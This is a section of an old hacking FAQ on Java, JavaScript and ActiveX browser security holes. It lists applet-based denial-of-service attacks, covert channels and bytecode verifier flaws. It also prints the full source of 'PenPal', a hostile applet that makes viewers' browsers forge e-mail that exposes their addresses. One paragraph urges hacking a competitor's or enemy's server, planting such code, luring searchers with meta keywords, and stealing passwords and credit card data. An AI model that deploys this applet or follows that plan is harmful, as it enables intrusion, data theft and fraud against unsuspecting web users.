Fun with Java/JavaScript/ActiveX
Section 05: Fun with Java/JavaScript/ActiveX
05-1. What is a JavaScript Applet?
JavaScript is Netscape's way of allowing a server to send code via HTML directly to your browser. Since Java is built into Netscape, JavaScript "applets" can be constructed by simply including the text inside the HTML document. When someone accesses your page -- bingo! -- the code then uses Java and performs some function. They can work on 16-bit and 32-bit versions of a Web browser that supports Java, e.g. Netscape.
Also, if you have a Java compiler you can compile an applet and have the appropriate code in the HTML document and load it up to the browser. This approach is even better as you can use more features. This is typically supported in a 32-bit browser that supports Java. This means that a 16-bit version of Netscape (such as that for Windows 3.x or Macintosh) will not support it. There is no intention of anyone writing a 16-bit browser that supports Java applets.
05-2. What is the JavaScript problem?
By taking advantage of certain Java classes within Netscape, control is handed over to the applet, not the user. These can even be done without the user even knowing it. And they can do some pretty nasty things. Here is a summary reported to the Best-of-Security mailing list (edited with my comments).
Denial of service attacks. Denial of service attacks can be moderated to degradation of service, possibly after a time delay, to make someone else's product look bad. They can also crash your browser. They include but are not limited to:
- Busy-wait to consume CPU cycles
- Allocate memory until no more is available
- Lock crucial system classes, e.g. java.net.INetAddress. Blocks all hostname lookups. Several other classes are suitable for this attack.
Covert Channels. This involves using the browser as a means to attack "inside" the firewall, without the user's knowledge. They include but are not limited to:
- Send mail via an SMTP port on server
- Lookup fictitious DNS name to send out info
- Tell browser to access fictitious URL (can be redirected back)
Information available to applets. What applets can look at system-wise:
- Can benchmark machine by reading system clock
- Java hashcode() defaults to address of object, might leak some info
Implementation errors. Problems in Netscape's implementation of Java in the browser:
- DNS hack allowing connections to any machine (has been patched)
- Java disassembler (javap) has buffer overflows (not normally run by users)
Inter-Applet security. One applet can discover another and then manipulate the environment.
- Applets running from previous pages can learn of new applets by getting a handle to the top-level ThreadGroup and enumerating every thread running in the system.
- Can then call stop() and setPriority() on threads belonging to other applets, making them appear slow and unreliable.
Bytecode problem
The big one: Java bytecode safety checker doesn't detect illegality of
constructor()
{
try { super() } catch (Exception e) {}
}
This is not legal in the language - super() must not be called in a try clause. But the bytecode checker erroneously allows it. This allows subclasses of privileged system classes to be created. Normally those classes throw an exception in their constructor so they can't be instantiated. But this trick allows it.
This way users can create their own ClassLoaders, SecurityManagers, etc. By creating a hacked ClassLoader the Java class type system can be defeated by resolving different classes against each other. Any non static variable can be set, any public method can be called, including native methods. The security is gone.
Package name problem
If the first character of a package name is / the system will attempt to load code from an absolute path, which would be trusted since it comes from the local disk. Any Java class which the attacker can get onto the user's disk can then be loaded in trusted mode. Classes can be gotten onto disk simply by fetching URL's in Netscape, which puts them into its cache. If you can figure out Netscape's class naming scheme you can then run any class, trusted. (I think this one has been patched.)
What does all this mean? Not a whole lot, taken individually. But the clever hacker could start using these items in concert with other items listed in the FAQ and other simple hacking techniques. Of course only a fool would load this stuff up on their personal web page -- the best hack would be to compromise a competitor's server (if you're a business) or an enemy's home page. Then load the code into the page. Add meta keywords to your hacked page so when it is indexed by a spider, any web searches will lead innocent surfers to the page. Then simple things like this -- sending history and cache files (with any searches, passwords to other web pages, credit card info) through a remailer; to spawning root shell for backdoor access; to collecting your arch rival's customers as they come to the rival's page, rendering it so slow as to crash customers browsers (only after you've sent their e-mail address to yourself) -- all become possible.
05-3. What is an example of this "bad" Java code?
Here's an example freely available on the web. This should give you an idea.
/* PenPal.java by Mark D. LaDue */
/* March 15, 1996 *
/* Copyright (c) 1996 Mark D. LaDue
You may study, use, modify, and distribute this example for any purpose.
This example is provided WITHOUT WARRANTY either expressed or implied. */
/* This hostile applet forges an electronic mail letter from the person who
views the applet in a browser to the person whose address appears in the
string "toMe." The return address will be listed as
penpal@my.hostile.applet. The appropriate commands to use for
sendmail can be often be found in the file /etc/mail/sendmail.hf.
Note that while the person viewing the applet actually does initiate
the mail by connecting (involuntarily) to port 25, the applet host's role
in sending it is not so easily hidden. See the full header of any e-mail
letter sent by the applet for more details. By putting your address
in the string "toMe" and by scanning your incoming mail (with the
included shell script or another of your own), you can get the full
e-mail address, including the user name, of many people who view the
applet. */
import java.applet.*;
import java.io.*;
import java.net.*;
public class PenPal extends java.applet.Applet implements Runnable {
public static Socket socker;
public static DataInputStream inner;
public static PrintStream outer;
public static int mailPort = 25 ;
public static String mailFrom = "my.hostile.applet";
public static String toMe = "mladue@math.gatech.edu"; //Change this please!
public static String starter = new String();
Thread controller = null;
public void init() {
try {
socker = new Socket(getDocumentBase().getHost(), mailPort);
inner = new DataInputStream(socker.getInputStream());
outer = new PrintStream(socker.getOutputStream());
}
catch (IOException ioe) {}
}
public void start() {
if (controller == null) {
controller = new Thread(this);
controller.setPriority(Thread.MAX_PRIORITY);
controller.start();
}
}
public void stop() {
if (controller != null) {
controller.stop();
controller = null;
}
}
public void run() {
try {
starter = inner.readLine();
}
catch (IOException ioe) {}
mailMe("HELO " + mailFrom);
mailMe("MAIL FROM: " + "penpal@" + mailFrom);
mailMe("RCPT TO: " + toMe);
mailMe("DATA");
mailMe("Hey, it worked!" + "\n." + "\n");
mailMe("QUIT");
try {
socker.close();
}
catch (IOException ioe) {}
}
public void mailMe(String toSend) {
String response = new String();
try {
outer.println(toSend);
outer.flush();
response = inner.readLine();
}
catch(IOException e) {}
}
}
05-4. What about ActiveX?
ActiveX is Microsoft's answer to Netscape's PlugIns, allowing you to imbed things into HTML pages to perform various tasks. But if you do something odd-ball, like have a page try to load a movie from url file:///aux you will probably completely hang Internet Explorer and/or crash your computer.